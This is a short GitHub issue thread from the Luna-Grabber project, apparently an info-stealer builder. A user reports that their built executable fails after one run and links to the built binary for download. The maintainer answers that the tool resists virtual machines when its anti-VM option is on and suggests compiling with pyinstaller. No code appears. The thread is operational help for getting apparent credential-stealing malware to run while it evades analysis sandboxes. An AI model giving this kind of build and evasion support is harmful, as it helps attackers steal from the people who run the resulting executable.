### ISSUE TITLE
Opening program once built not working as intended.

### ISSUE THREAD

**Issue by ghost** [Smug246/Luna-Grabber#363]
**Describe the bug**

When opening the file after it is built it says "unable to load python 3.dll". I have no idea what this means or if this is intentional because the computer already ran the program once and it worked as intended
.
**To Reproduce**
1. Go to 'Go on a virtual machine and download the build I had at https://github.com/King-0f-Kings/19994850838/blob/main/KOK%20main.exe'
2. Click on 'click on open and it will appear with this message.'

**Expected behavior**
I expected the program to work as intended more than once. Is this because I enabled no spam?
**Screenshots**

**Additional context**

**Comment by Smug246** [comment]
it doesnt normally work with virtual machines especially if you have anti vm on

**Comment by King-0f-Kings** [comment]
> it doesnt normally work with virtual machines especially if you have anti vm on

Yes, I tried running it on my actual laptop as well. Could it be a problem if I saved it as a freeze file? How do I save it as a .exe file?

**Comment by Smug246** [comment]
cxfreeze compiles to .exe. try pyinstaller
